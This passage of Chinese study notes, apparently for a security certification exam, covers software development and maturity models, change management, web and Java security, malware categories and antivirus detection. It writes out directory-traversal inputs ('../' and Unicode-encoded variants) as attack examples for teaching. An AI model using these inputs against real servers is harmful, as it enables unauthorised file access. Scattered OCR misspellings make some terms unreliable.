纯瀑布模型是高度结构化的,不允许返回前一阶段再作更改。而迭代方法是不断改进完善 的,需要一个变更控制机制。 ①原型:先构建一个简单的初始软件版本。 *快速原型/敏捷开发(RAD):原型的一种特殊实现,在每个阶段有严格的时间限制,如 果决策变化太快,软件质量可能不够高。(这种原型用于演示,用完就丢,不作最终产品) *改进的原型模型/演化原型(MPM):原型的一种,用于 Web 应用开发,渐进式改进,非 常灵活。(实验室里开发的原型,测试后,将成为最终产品) *运行原型:是演化原型方法的延伸,是已经安装部署在实际运行环境中的原型,微调后 即可继续使用在生产环境中,其软件变更都发生在工作场所。 ②联合分析开发(JAD):最初用于开发大型机系统,逐步演进为 RAD 模型、Web 开发模 型或其它模式的组成部分。它是一个管理过程,联合用户与开发人员协同工作,加强沟通,提 高功能的满足度。但大量的参与人员可能影响系统在安全设计方面的考虑。 ③探索模型:综合考虑所有可能的需求来建立一个有前瞻性的系统,由于缺少结构化,安 —237— 全需求可能处于次要地位,一般有特殊要求时才考虑。 ④敏捷软件开发 Agile Software Development 是一种以人为核心、迭代、循序渐过的开发方法,快速的灵活的开发方法,有很多变种模 型,是几个开发方法的总称。如:Scrum (迭代式增量软件开发过程),敏捷统一过程(AUP), 动态系统开发模型(DSDM),和极限编程(XP)。它有 4 大特点: 1)实践检验,working software is the primary measure of progress; 2)简单高效,simplicity is essential; 3)绑定需求,business people and developers must work together daily; 4)当面沟通,the most efficient method of conveying information is face-toface。 ⑤增量模型:类似于“多个瀑布”周期出现在同一个软件上,在开发阶段不断走向成熟。 使用增量模型时,每一个增量阶段都会产生一个可以交付、 可运行的产品。 3.其它方法和模型 也有软件开发方法不依赖迭代或不分块迭代,如: ①计算机辅助软件工程(CASE):使用辅助工具软件来进行系统的分析、设计、开发、实 施和维护等,常用于大型系统开发。它为规划师、设计师、编码人员、测试人员等提供了个共 享资源、协同工作的机制。 ②基于组件的开发:将功能拆分为组件进行编码并按标准进行封装,而不是单独开发某个 业务功能,可以节约成本、加快进度。从安全的角度看,当组件进行过安全测试后,可以被重 复使用。这与面向对象的编程(OOP)类似,设计对象和类时就要考虑安全因素,并实例化。 ③重用模型:基于现有的组件来构建应用,该方法最适合用于面向对象开发的项目,因为 对象可以被导出、重用或者修改,并可基于已知的安全特性进行选择。 ④极限编程(考点):一种基于沟通和反馈的简单化的软件开发方法,它是一种相当结构 化的开发方法,依赖于子系统的功能限定、范围定义和结对编程。团队通过发布一系列小且集 成安全的软件来满足用户需求。 ⑤有三种原型法,上面也讲过了: 快速原型法(rapid prototype /throwaway):开发团队尽可能迅速的“粗制滥造”的开发 出原型用于测试,在掌握精细需求和确定高效方法后,这个原型一般就丢弃了。 进化式原型法(evolutionary prototype):不断改进目标的方式进行开发,原型会持续改 进直到产品最后阶段。 操作原型(operational prototype):是进化式原型的升级,也不断完善,但不是等交付 一个版本后来改进,而是边用编写,在生产中不断调整。 A.2 成熟度模型 1.软件能力成熟度模型 Software Capability Maturity Model 软件工程研究所(SEI)在卡内基梅隆大学介绍了软件能力成熟度模型,也被称为软件能力 成熟度模型(简称 SW-CMM,CMM 或者 SCMM) ,它的目的是帮助软件组织提高其软件过程的成熟 度和质量,从一个临时的、混乱的过程,通过一个渐进的路径实现成熟的、严格的软件过程。 因为软件质量取决于其开发过程的质量。此外,国际标准化组织(ISO)在其 ISO-9000 技术标 —238— 准族中对软件开发进行了规范,即 ISO/IEC 90003:2004,该标准为企业使用 ISO-9001:2000 时提供指南,其内容包括软件及相关服务的采购、供应、开发、操作和维护。 目前业内有几种不同的 CMM,容易使人混淆。CMMI 开发汇总了众多不同的成熟度模型,使 其可以用于一个框架之中,已经取代了 CMM。能力成熟度模型集成 CMMI(Capabi1ity Maturity Model Integration),集成了一整套产品和软件开发指南。它涉及软件开发生命周期的不同阶 段,包括概念定义、需求分析、设计、开发、集成、安装、操作、维护等阶段,以及每个阶段 应该做什么。可以根据该模型来评估安全工程实践并标识改进方法。客户也可以根据它来评估 软件供应商,最理想的情况是二者结合,即软件供应商使用该模型提升流程,而客户使用该模 型评估供应商的能力。 SW-CMM 的成熟度级别如下:IRDMO-初、重、定、管、优 *第一级:初始级 Initial。小作坊杂乱作业,没有定义软件开发过程。 *第二级:可重复级 Repeatable。有基本的项目管理制度,控制费用和时间,管理人员可 及时发现问题,采取措施。 *第三级:己定义级 Defined。有一套正式的、文档化的软件开发过程进行运作。所有开 发项目都在标准管理模型的约束下进行。SEI 定义这个级别的关键过程有:组织过程定义、组 织过程焦点、培训大纲、软件集成管理、软件产品工程、组织协调、专家评审等。 *第四级:己管理级 Managed。利用定量措施,以获得对开发过程的详细掌握和管控,包 括:定量过程管理和软件质量管理。 *第五级:优化级 Optimizing。开发过程不仅量化可控,还不断改进完善。 新的专门针对安全软件开发成熟度的模型有: ①SAMM,Software Assurance Maturity Model ②BSIMM:在成熟模型中构建安全 Building Security In Maturity Model 2.lDEAL 模型 —239— 软件工程研究中心也为软件工程开发了 IDEAL 模型,它实现了许多 SW-CMM 的属性,可以 用来做变更管理。它将开发模型和过程划分为五个阶段: ①I:启动阶段 Initiating。掌握业务需求,构建基础架构,筹备开发工作。 ②D:诊断阶段 Diagnosing。分析组织当前的状况,并提出应对变化的建议。 ③E:建立阶段 Establishing。采取上面的建议,计划并实施具体工作来应对变化。 ④A:行动阶段 Acting。根据详细解决方案实施具体内容,如测试、提炼、实现等。 ⑤L:学习阶段 Learning。持续分析它的效果,改进完善相关行动。 3.甘特图 Gantt Charts 甘特图是一种以条状图的方式表示特定项目和计划之间的时间关系。提供了一个图形化的 图标说明,有助于在项目中计划、协调和跟踪特定任务。就是纵向任务线、横向时间轴的项目 计划示意图。 4.计划评审技术(PERT) Program Evaluation Review Technique (PERT)是一个项目调度工具,用来判断在开发软件产品和计算标准差(SD)时的风险评估方 法。PERT 近似的估算出三个时间值,即最短、最长和最有可能持续时间。PERT 被用来直接改 善项目管理和软件编码以制造更有效的软件。由于编程和管理能力提高,软件的实际生产花费 的时间应该是较小的。 A.3 操作与维护 在系统部署应用后,要监控系统性能并保证操作的连续性,包括:检测缺陷、管理和预防 —240— 故障、故障恢复以及系统变更改进等。安全性管控包括:测试备份与恢复机制、确保对数据的 处理正确无误、确保安全功能有效。 在维护阶段,发生重大变更时,要周期性的进行风险分析并对敏感应用重新认证,以验证 系统的安全功能未受影响,并指定专人对系统的功能和服务水平进行验证,确保系统满足使用 需求和安全基线。 A.4 变更管理 1.变更管理的工具软件 Tripwire,用来监测数据完整性的工具,可以辅助监控系统的变化。也可以将 Tripwire 的通知和告警信息集成到监控中心进行关联分析。 2.变更管理流程的三个基本组件: 变更控制(change control)是管理所有产品或系统变更的系统化方法。目的是确保不实 施没必要的变更、所有的变更都得到证明、服务不受不必要的干扰且资源都有效利用。在 IT 领域中,变更控制是变更管理(change management)的一部分。 ①请求控制。Request Control provides a framework for user requests. ②变更控制。Change Control。控制变更使其符合质量要求,正确记录编码的任何变化等。 ③发布控制。Release Control manages the deployment of code into production.在 发布新的软件之前,要进行双重检查,确保调试代码或后门都被清除,还要控制软件版本。 如果有变更实施了,影响了其它系统,就要实施配置管理 Configuration control 了,它 有四个主要组成部分:配置识别、配置控制、配置状态报告、配置审核。Configuration control ensures that changes to software versions are made in accordance with the change and configuration management policies. 3.变更管理的关键点是: ①必须有严格规范的过程管理,确保质量。 ②必须按规定进行请示报批、测试和记录。 ③必须有应急恢复措施以防变更失败。 4.变更的流程 ①请求变更 Request。 ②影响分析/影响评估 Impact Assessment ③审查变更 Review ④批准/不批准 Approve/reject/Approval/Disapproval ⑤构建和测试 Build and Test ⑥通知/通告 Notification ⑦实施变更 Schedule and implement。 ⑧验证 Validation ⑨记录/版本更新和基线 Document。 —241— A.5 综合性产品团队(例如: 开发运营) 也有翻译成“集成产品团队”的,也就是 XX 课题攻关小组。Integrated product team。 集成产品和过程开发(IPPD)Integrated Product and Process Development,是一种管 理技术,通过 1 个综合性的团队来优化设计、生产和服务的过程,包括必须的采购活动。IPPD 的一个关键原则是:通过综合性产品团队(IPTs)来实现多学科团队协同工作。(中国的单位 经常为了应对某一任务临时抽组各部门的人员成立的专项工作小组) 1.DevOps 方法 DevOps 是用于提高软件开发效率的一种项目管理方法及过程(一个模型)。软件工程一 般存在软件开发、质量保证和技术操作(Software development、Quality assurance、IT operations)这些重要职能之间严重脱节的情况,不同团队的个人,各司其职,往往相互矛盾, 导致了在创建代码、测试和部署到生产环境之中的环节产生冗长的时间延迟。当问题出现的时 候,他们不是一起合作解决问题,团队之间常常将问题抛给对方,导致反复地官僚主义。DevOps 方法旨在通过将三种职能融合在在一个单一的运作模式下来解决这些问题。DevOps 这个词是 开发 Development 和运行 Operations 的组合体,标着着这些功能必须合并和合作去满足业务 需求。DevOps 模型与敏捷开发方法关系紧密,目的都是为了减少开发所需的时间、以及测试 和部署软件的变更。使用 DevOps 模型可以很轻松的在 1 天时间内多次部署代码。 ①支撑 DevOps 构件的核心公共原则(考点): *对原型系统进行开发和测试。 *使用可重复的、可靠的流程进行部署,促使开发和运营以迭代的方式稳步发展。 *实时智能地监控和验证运营质量。 *形成闭环管理:企业建立对接机制,让所有利益主体掌握并及时有效处置各种反馈。也 称为放大反馈环,这项原则呼吁组织建立沟通渠道,让所有利益相关者访问并对反馈采取行动。 ②目标: 流程的自动化。 ③最终目的: 提高客户响应能力。 B.在开发环境中执行安全控制 B.1 软件环境的安全 软件开发在需求阶段进行安全策略设计是最节约成本的。(越早做安全越好) 1.Web 安全 由于 web 系统和应用的可访问性,输入验证是关键,应用代理防火墙在这方面最适合,但 要确保代理可以处理缓冲区溢出问题,身份认证问题,编码问题(例如 Unicode),和 URL 编码 和转换等。 ①开放 Web 应用安全项目(OWASP)/如何确保网站安全(必考) 在第八域 B.1 章节也讲了。OWASP 是一个致力于提高软件安全性的非营利机构。OWASP 开 发了大量免费的实用产品,其中包括: —242— ①OWASP 十大项目:基于 Web 应用存在的十大缺陷给出抑制它们的方法。 ②OWASP 指南项目:一部说明如何设计出安全的 Web 应用和服务的全面手册。 ③OWASP 软件保障成熟度模型(SAMM):SAMM 是一个框架,用于针对机构面临的具体风险量 体裁衣地设计软件。 ④OWASP 移动项目:为开发人员和架构师开发和维护安全移动应用提供了资源。 有鉴于基于 Web 和基于云的解决方案使用得非常普遍,OWASP 提供了一个带 Web 应用安全 流程的可访问全面框架。你应该对 OWASP 的作品有一个全面的了解,搞清如何将其应用到自己 的任务中。OWASP 识别出的 10 大顶级风险有: A1:注入;A2:跨站脚本攻击(XSS);A3:无效的认证和会话管理; A4:不安全的直接对象引用;A5:跨站请求伪造(CSRF); A6:安全配置错误;A7:不安全的加密存储;A8:URL 访问限制失败; A9:薄弱的传输层保护;A10:未经验证的重定向和转发。 ②Web 应用安全联盟(WASC) Web 应用安全联盟(WASC)是一个组织,它为 Wor1d Wide Web 和组成万维网的基于 Web 的 软件提供了最佳安全实践标准。这个组织提供了一系列的资源、工具和信息,可以通过它们了 解这些基于 Web 的软件开发中常见的安全问题以及如何避免它们。该组织拥有一个 Web 应用程 序扫描评估标准,可用于评估各种厂家的产品和实践。它提供了 Web 应用程序的安全指标和威 胁分类,并维护着蜜罐进行实时超文本传输协议(HTTP)的 Web 威胁流量分析。这个组织阐述的 最常见的顶级攻击方法有: ①跨站请求伪造(CSRF);②跨站攻击(XSS);③拒绝服务攻击(DOS); ④已知漏洞;⑤暴力攻击;⑥隐藏参数操作;⑦网银木马;⑧点击劫持。 ③关于输入验证的攻击 客户端都要通过发送指令、表单什么的请求 WEB 服务,必须要对 WEB 输入的内容进行验证, 不然会因为输入一些特殊字符而被攻击。如: 1.路径/目录遍历(Path or directory traversal):这个攻击又被称为“点-点-斜线”、 “../”dot dot slash;在 URL 中接入几个“../”就可以访问上级的文件目录了。 2.统一代码编码(Unicode encoding):Unicode 是一种行业标准,开发他的目的是为了以 标准的编码格式来表示世界上的 10 万多个文本字符。Web 服务器通过 Unicode 来支持不同的 字符,在 Unicode 下,攻击者不用“../”来攻击,而使用 Unicode 的“%C1%lc,%c0%9v,and %C0%af” 来攻击。 3.网址编码(URL encoding):在 URL 中,“空格“表示为“%20”,其实其它字符也可以 在 URL 里用特殊的方式来发送。 4.客户端验证(Client-side validation ):是指将指令发送到服务器之前在客户端进行 验证,如果黑客劫持攻击者环境,插入恶意数据,也就绕过了这个验证了。 还有缓冲区溢出(buffer overflow)、SQL 注入、XSS 什么的,后面的应用程序安全里讲, 这里不解释了。 2.开源 开源的不好就是,它的漏洞问题可以更广泛、更容易的被其它人发现。 —243— 开源的开放性能促进快速的识别和修复任何问题,包括那些与安全相关的问题。有一种安 全称为“隐晦安全”的想法,即如果一个系统不为人知,它被人找到如何攻破的可能性就会降 低。也就是越小众的系统,暴露的漏洞也越少。 全面披露:指发现安全漏洞的个人应公开的传播此信息。 3.Java 安全 在字节码被解释的时候,Java 检查应用使用的变量和内存。这种检查对于安全可能是好 事,或坏事。通常,这是件好事,因为程序正确的使用内存且不超出设定的边界。但是,过分 依赖这些功能,如果开发者不在他们的代码中使用额外的安全检查,可能引起马虎的作风以致 引起其它安全问题。例如,Java 通常被认为非常善于垃圾收集,自动的内存单元的检查,和 不再需要的内存的取消分配。这是好事,它确保程序不会充满所有可用内存然后运行遇到问题。 但是,这个语言没有办法决定信息的敏感性,它可能存储于那些内存单元。因此,它可能导致 敏感信息被不正当的泄露。不提供垃圾收集服务的语言要求程序员关于内存分配做出自觉的选 择,并且这种选择可能提示程序员在其返回可用内存池之前,覆盖内存单元。 Java 安全方法的三个部分(有时被称为层)是(考点): ①验证器(或翻译器)interpreter:有助于确保类型安全;它主要负责内存和边界检查 ②类加载器:从 Java 运行时环境动态地加载和卸载类 ③安全管理器:作为安全的看护者防止恶意功能 沙箱(Sanddox): Java 最初是为一个分布式应用环境设计,因此安全模型建立了一个沙箱,其对分布式 Java 程序可以做什么和不可以做什么进行严格控制。一个不同于沙箱方法处理动态代码的方法是只 允许可信代码运行。例如,ActiveX 控件只有在你完全信任控件签名的实体时,才可以执行。 不幸的是,ActiveX 系统的设计和实现都有问题。ActiveX 没有沙箱来限制一个 ActiveX 控件 的活动,它可以对可用的可执行程序执行任何行动或功能,不存在对程序的可靠性或边界限制 的运行时检查。 针对是沙箱的攻击是:延时木马(在沙箱完成检验后,沙箱重置后运行)。 4.分布式面向对象系统 (没内容可考) 很多通过使用基于分布式对象的软件系统构建,例如公共对象请求代理体系架构(CORBA), Java 远程方法调用(JRMI),企业 JavaBean(EJB),和分布式组件对象模型(DCOM)。分布式面 向对象系统允许系统的组件位于网络内分开的很多多计算机上。 对象如何相互通讯是复杂的,尤其是因为对象可能不是驻留在同一台机器上,而是可能位 于跨网络的机器上。为了使这个过程标准化,对象管理组织(OMG)创建了一套标准来发现对象, 初始化对象,和给对象发送请求。这个标准就是对象请求代理(ORB),它是公共对象请求代理 体系架构(CORBA)的一部分。 ①公共对象请求代理体系架构(CORBA) 公共对象请求代理体系架构(CORBA)是一套由对象管理组织OMG(Object Management Group) 定义的工业标准,它解决硬件和软件产品之间的互操作需求。包括 2 部分: 面向系统组件(对象请求代理 ORB+对象服务 OS),system-oriented components (object —244— request brokers and objectservices); 面向应用组件(应用对象 AO+通用设施 CF),application-oriented components (application objects and common facilities)。 对象请求代理 ORB 是中间件,管理组件中的所有通信,建立了对象之间一个客户-服务器 关系,使他们能在异构和分布式环境中交互,且与运行的平台无关,提高互操性。ORB 依赖于 Object Service,以提供访问控制、跟踪、重定位对象和建立对象。ORB 就是中间件。CORBA 安全服务支持四种类型的策略:访问控制,数据保护,抗抵赖和审计。 EJB 是 Sun Microssystem 的模型,提供了构建可扩展,分布式,多层,基于组件的应用 的 API 规范。EJB 使用 Java 的 RMI 实现通信。EJB 服务器提供了事务,安全和资源共享的标准 服务集合。EJB 的优点之一是允许人员组装组件来控制访问。不是通过组件开发人员硬编码策 略,最终用户(即,系统管理员或安全员)可以指定安全策略。其它安全功能也提供给最终用户。 EJB 的一个脆弱性是 RMI 的著名的弱点。例如,RMI 通常配置为允许用户在代码不存在的情况 下自动地从服务器下载。因此,在客户可以建立安全的连接之前,依然能够下载代码或者一个 恶意的攻击者可以伪装成服务器的客户并下载代码。虽然己经做了改进,增加了 RMI 的安全性, 所有的现都必须对安全功能进行评审。 ②分布式计算环境(Distributed Computing Environment,DCE), DCE 由 OSF(Open Software Foundation)开发,也被称为 Open Group,是行内第一个尝试 分布式计算的框架,是一个基于 RPC 通信层的管理服务。他是 C/S 框架并被多家厂商采用。DCE 提供远程过程调用(Remote Procedure Call (RPC))服务,安全服务、目录服务、时间服务 以及分布式文件支持等。DCE 是通过客户端/服务器模型标准化异质系统通信的首个尝试,它 为后来的 CORBA、DCOM 和 J2EE 等分布式计算技术提供了多个基础性概念。 DCE 使用通用唯一标识符 UUID(Universal Unique Identifier)来唯一标识环境内的用户、 资源和组件。下面的 DCOM 则使用全球唯一标识符 GUID(Globally Unique Identifier)。 ③分布式组件对象模型(Distributed Component Object Model,DCOM) DCOM 支持程序中的组件交互,定义了组件内的交互关系,为简单的交互处理通信提供一 个体系结构,支持分布式进程通信(IPC—InterProcess Communication),支持应用访问网络 中不同位置的对象。他类似功能的组件还有:面向消息的中间件 MOM (message-oriented middleware)、开放数据库连接 ODBC (Open Database Connectivity)等。 COM/组件对象模型(Component Object Model)是由微软发的一套标准化 API、组件命名机 制和通信标准,允许同一应用内的进程间或相同计算机系统内不同应用的进程之间的通信。 DCOM 已经淘汰,被.NET Ramework 取代。 ④对象链接和嵌入(Object Linking and Embedding,OLE) 程序调用另一个程序的能力称为链接。将一段数据放入外部程序或文档的能力称为嵌入。 对象链接和嵌入 OLE 为在本地个人计算机上其事对象提供了一种方式,并使用 COM 作为其 基础。OLE 使对象(如图形、图片和电子表格)可以嵌入文档中。OLE 还允许链接不同的对象和 文档。例如,当你创建一个包含 URL 的文档时,URL 会变成带下划线的蓝色字符,指示用户可 以单击 URL 转到相应的 Web 站点;这是链接能力的一个示例。如果你在文档中增加一个电子 表格,那么就是嵌入的例子。如果你需要编辑这个电子表格,那么只要双击该表格,操作系统 —245— 就会打开正确的环境(可能是 Excel)让她进行编辑修改。 在万维网(Wor1d Wide Web)中应用的 OLE 技术称为 ActiveX。ActiveX 组件与其他组件一 样,但是可以进行移植。ActiveX 组件可以运行在任何支持 DCOM(使用 COM 模型)或者使用 DCOM 服务进行通信的平台上。 在前面“数据库和数据仓库”里也讲过 OLE。 5.库和工具集 软件库是由预先写好的代码,类,过程,脚本,和配置数据组成。一个开发者可能手动地 为程序添加一个软件库以获得更多的功能或者自动化一个过程而不用从头开始编写代码。在计 算机编程中,标准库是跨编程语言实现可用的库。标准库通常包括常用算法的定义,数据结构, 和输入和输出机制。常见的编程语言库有: *C 标准库,为 C 语言提供; *C++标准库,为 C 一语言使用; *框架类库(FCL),为.NET 框架使用; *Java 类库(JCL),为 Java 编程语言和 Java 平台使用; *Ruby 标准库,为 Ruby 编程语言使用。 6.集成开发环境 IDE 集成开发环境把很多工具的功能组合到一个软件程序,供开发人员使用。集成开发环境的 设计,提供带有相似的用户界面的紧密的组件,以最大限度地提高程序员的工作效率。IDE 展 现为一个单独的程序,所有的开发工作都在其中完成。有时,也包括了版本控制以帮助计算机 程序员管理图形用户界面(GUI)的开发。 7.运行时 Runtime 每种编程语言都有某种形式的运行时系统,就是运行环境;不管是编译语言,解释语言, 或嵌入的特定领域的语言,或是通过一个 API 调用。除了支持语言构建的行为,一个运行时系 统可能也执行支持服务例如类型检查,调试,或代码生成与优化。例如,Java 运行时环境(JRE) 就是当你使用 Java 软件时要用的。JRE 由 Java 虚拟机(JVM),Java 平台核心类,和 Java 平台 支持库组成。JRE 是 Java 软件的运行时部分,你的 web 浏览器中需要运行的只有它。运行时 系统也是网关,通过它一个运行的程序可以与运行时环境交互,它包含状态值,其在程序执行 时可以访问,还有活动的实体,在程序运行时可以和其交互。环境变量是很多操作系统的功能 并且是运行时环境的一部分;一个运行的程序可以通过运行时系统访问它们。 从 SQL Server 2005 开始,SQL Server 提供了 Microsoft Windows 的.NET 框架公共语言 运行时(CLR)组件的集成。这意味着,现在你可以使用任何.NET 框架语言,包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#,编写存储过程,触发器,用户定义类型,用户 定义函数,用户定义聚合,和流表值函数。 B.2 源代码层面的安全弱点与脆弱性 (例如:缓存溢出、权限升级、输入\输出验证) 一、恶意代码 Malicious Code 病毒、木马等任务威胁计算机安全的代码。还有什么间谍软件、广告软件,不说了。 有害代码的分类: —246— ①文件感染型病毒 File-infecting Virus;②引导区病毒 Boot Sector Virus ③邮件病毒 Email Virus;④宏病毒 Micro Virus ⑤脚本病毒 Script Virus;⑥木马 Trojan Horses ⑦远程访问木马 Remote Access Trojan,RAT;⑧炸弹 Bomb;⑨蠕虫 Worm 1.病毒 Viruses 把一个程序定义为病毒的唯一要求是它可以自我复制。 病毒的 3 个特征:隐蔽性、破坏性、可传播性。 ①病毒传播 Virus Propagation 借助于大意的计算机用户可通过交换磁盘、共享网络资源、发送电子邮件或其他共享数据 的手段来传播。有 4 种常见的传播技术:主引导记录感染、文件感染、宏感染和文件注入。 引导区病毒,引导扇区和主引导记录 master boot record infection 主引导记录 MBR 是一个单独的磁盘扇区,通常是在启动过程的初始阶段读取的介质的第一 个扇区。MBR 决定介质的哪个部分包含操作系统,并且随后指导系统读取对应部分的引导扇区, 以便加载操作系统。MBR 病毒将系统重定向到被感染的引导扇区,在从合法引导扇区加载操作 系统之前将病毒加载到内存中。引导扇区病毒实际上感染合法的引导扇区,并且在操作系统加 载过程中被加载到内存中。主引导记录感染主引导记录病毒(MBR)是己知的最早的病毒感染形 式。由于 MBR 非常小(通常只有 512 字节),因此它不能包含实现病毒传播和破坏功能所需的所 有代码。为了避开空间的限制 MBR 病毒引导系统读取并且执行在另一个地方存储的代码,从而 将全部的病毒加载到内存中。 文件程序感染病毒 file infection 感染病毒的可执行文件。 宏病毒 macro infection 用宏语言编写的病毒,独立于平台,利用应用软件允许运行脚本的功能,像 Visual Basic for Applications (VBA)什么的。由于许多应用程序都允许宏程序嵌入到文档中,当打开文档 时,程序会自动运行。这提供了病毒传播的不同机制。 服务注入病毒 service injection 注入到操作系统中的可信运行进程中,如 svchost.exe 、winlogoin.exe 和 explorer.exe 等。通过成功地使这些可信的进程,恶意代码能够绕过主机上安装的任意反病毒软件的检测。 2.其它病毒类型 压缩病毒 另外一种类型的病毒,把自身附着在系统的可执行程序上,利用用户的权限压缩。 隐蔽性病毒(stealth virus) 隐藏它对文件和引导记录所做的修改,这可以通过监视系统读取文件和扇区的功能并伪造 结果来完成。 多态性病毒 产生自己不同的可操作副本。多态性病毒没有任何部分相同,很难直接根据病毒特征来检 测它们。 分体病毒(multipart virus) —247— 也叫多方病毒,它有几个组件,可以分布在系统上不同部分。它以多个方式感染和传播, 即便被识别也很难完全清除。 自乱码病毒(sel-garbling virus) 通过打乱自身代码使之不与预定义的病毒特征相匹配,从而可以逃避防病毒软件的检测。 大脑模仿病毒(meme virus) 实际上并不是计算机病毒,而是一种在网络上不断转发的电子邮件。 蠕虫(Worm) 它们无须主机应用程序便可自我繁殖,是自我约束程序。 其它还有:混合型病毒 multipartite、邮件病毒、脚本病毒(script virus)、隧道病毒 (tunneling virus)什么的。 3.病毒技术 Virus Technologies 搞清四种类型的病毒:复合病毒、隐形病毒、多态病毒和加密病毒。 ①复合病毒 Multipartite Viruses 复合病毒使用多种传播技术来渗透只有单一防御手段的系统。例如,在 1993 年发现的 Marzia 病毒既是一种文件感染程序病毒,也是一种引导扇区病毒。(有多种手段传播) ②隐形病毒 Stealth Viruses 隐形病毒对操作系统进行篡改,从而欺骗反病毒软件,将自己隐藏起来。 ③多态病毒 Polymorphic Viruses 在系统间传输时,多态病毒会修改自己的代码,自动产生各种变种,使得特征型反病毒软 件包失效。 ④加密病毒 Encrypted Viruses 类似多态病毒,每个被感染的系统呈现不同的特征。不过,加密病毒不是通过改变其代码 生成这些修改过的特征,而是修改了在磁盘上的存储方式。即对存储在磁盘上其他地方的主病 毒代码进行加载和解密。因为每个感染过程都使用不同的密钥,所以感染的系统会呈现出完全 不同的样子。不过,病毒解密程序往往包含指定特征,因此加密病毒很容易被更新的反病毒软 件包识破。 3.逻辑炸弹 Logic Bombs 逻辑炸弹是感染了系统但一直保持休眠状态的恶意代码(病毒),当达到或满足一个或多 个逻辑条件(例如时间、程序启动、Web 站点登录等)时,它被触发。 4.特洛伊木马 Trojan Horses 各种木马,不解释。是恶意代码,不是病毒。 5.僵尸网络 Botnets 僵尸网络(botnet)由 Internet 上被僵尸主控者/僵尸牧人(botmaster)控制的众多计算机 (肉机 bot)组成。 6.蠕虫 Worms 蠕虫是不需要任何人为的干预就可以自我传播的病毒。互联网上发生的首例安全事件就是 蠕虫病毒。可以关注一下震网病毒(STUXNET),它是蠕虫,但它带来的更多研究都是关于 APT 攻击的。 —248— 7.反病毒机制 Antivirus Mechanisms 基本上就是特征检测了,需要一个极大的病毒特征库,如果查到病毒,有 3 各处理方法: ①如果可以杀毒,那么杀。 ②如果不知道怎么杀,那么隔离,等管理员分析处理。 ③如果文件无法隔离又很危险,直接删除。 另一种方法就是启发式的机制 heuristic-based mechanisms。这些方法通过分析软件的 行为,来寻找病毒活动的迹象,如:试图提升权限级别,掩盖他们的电子痕迹什么的。几乎所 有防病毒软件产品都使用“启发式检测(heuristic detection)”,这种方法会分析恶意代码 的总体结构,评估编码指令和逻辑功能,并研究病毒或蠕虫内的数据类型。因此,它收集与这 段代码有关的大量信息,并评估其作为恶意代码的可能性。这种方法采用一个“可疑性计数器”, 该计数器的计数将随着程序发现潜在的恶意属性的增多而递增。如果计数器超过某个预先设定 的限值,那么就确认该代码为危险代码,防病毒软件会立即采取行动以对系统进行保护。这使 得防病毒软件能够检测出未知的恶意软件,而不是仅仅依靠病毒特征。 还有一种方法是 Tripwire 数据完整性保证软件包,用于检测发生了未授权的文件修改, 它要维护一个系统所有存储文件的散列值的数据库来实现完整性检测。 二、应对措施 培训和明确的安全策略可以大大减少用户的危险。一些指南也给出了应对恶意软件的最佳 实践:*不要双击附件;*当发送附件的时候,提供一个明确和具体的对附件内容的描述;*把 不要盲目地使用应用最广泛的产品作为公司标准;*禁用 Windows 脚本宿主,如 ActiveX、 VBScript、和 JavaScript;*不要发送 HTML 格式的电子邮件;*使用一个以上的扫描器,并扫 描一切。 针对恶意代码的主要防护手段是使用反病毒过滤软件。这些软件都是基于特征库的,要重 点关注 3 个方面的问题:一是客户端都要安装使用并更新反病毒软件;二是保护服务器更重要; 三是有必要能网络通信流量进行过滤。对于没有更新库的新型病毒,也要采取相应的措施: 一是使用完整性检查软件(例如 Tripwire)扫描文件系统中异常的更改并定期报告。 二是应当严格地维护和实施访问控制,限制恶意代码传播和破坏能力。 此外,还有 3 种方法可以防范嵌入到活动进程的恶意代码: ①Java 的沙箱技术为 applet 提供了一个隔离的环境。 ②ActiveX 控件签名技术利用数字签名确保代码来自可信源。 ③通过白名单机制,在操作系统只允许己知的良好的应用程序运行,阻止未知程序。 1.防病毒软件的检测机制: ①特征型检测(Signature-based detection (also called fingerprint detection)): 分析恶意代码特征并提取为分析恶意软件的指纹,时新病毒没有用。 ②启发式检测(heuristic detection):分析恶意代码的整体结构,评估编码指令和逻样 功能,并研究病毒的数据类型。其中,审查与代码有关的信息称为静态分析(static analysis), 而允许一部分代码在受控的环境中运行,称为动态分析(dynamic analysis)。 ③沙箱或虚拟机(virtual machine or sandbox):允许可疑代码中的某种逻辑在这个受保 护的环境中运行。使得防病毒软件可以动态的检查可疑代码,获得与该代码有关的信息。 —249— ④行为阻止器(behavior Mockers) 防病毒软件发展的下一个阶段称为行为阻止器(behavior blocker),自动阻止以下行为: *写入启动文件或注册表中的 RUM 健;*打开、侧除或修改文件;*在电子邮件中插入脚本,并 发送可执行代码;*连接到网络共享文件或资源;*修改一个可执行文件的逻辑等。 另一种分类将恶意软件或杀毒软件的机制分为 3 种: 迄今为止,有三种主要类型,首次由 Fred Cohen 在他的研究中讨论: ①已知特征码扫描。——类似基于签名的 IDS。 ②活动监控。——类似基于规则的 IDS。 ③变化检测。——类似基于统计的 IDS。 三、密码攻击 Password Attacks 1.密码猜测攻击 Password Guessing 凭经验,用一个好的密码字典就可以轻松猜解弱口令。 2.字典攻击 Dictionary Attacks 字典攻击很常见了,对于散值存储的密码可以用彩虹表来破。 至于社会工程学攻击,就不多说了,反正会忽悠比什么都来得快。 四、应用程序攻击 1.缓冲区溢出 Buffer Overflows 输入内存的数据太大,就会“溢出”其存储空间(编程函数先定义一个变量 var 什么的, 执行时操作系统会给程序一个内存空间的),溢到隔壁的存储空间里,可能被正常执行了或影 响别的进程了。利用缓冲区溢出漏洞可以在服务器上执行任意代码。 许多编程语言对变量的长度不强制实施限制,这就要求编程人员对代码进行边界检查。只 要允许用户输入程序变量,编程人员就应当采取有效措施,确保满足下列各项条件: ①用户输入的值的长度不能超过任何存放它的缓冲区的大小。 ②用户不能向保存输入值的变量类型输入无效的值。 ③用户输入的数值不能超出程序规定的参数操作范围。 如果没有执行对上述条件的简单检查,那么就可能造成缓冲区溢出漏洞。 2.检验时间/使用时间攻击 Time of Check to Time of Use(必考) 也称为异步攻击(asychronous attack),有的人把竞争条件(race condition)也看作是 这种攻击,其实是不一样的,竞争条件是改变进程的顺序(排序);TOC/TOU 是进入 2 个进程 之间进行更改(插队)。 检验时间到使用时间(time-of-check-to-time-of-use,TOCTTOU 或 TOC/TOU)是一个时间 型漏洞,当程序检查访问许可权限的时间早于资源请求的时间时,就会出现这种问题。例如, 如果操作系统针对用户登录建立了一个综合的访问许可权限列表并且在整个登录会话期间查 询这个列表,那么就存在 TOC/TOU 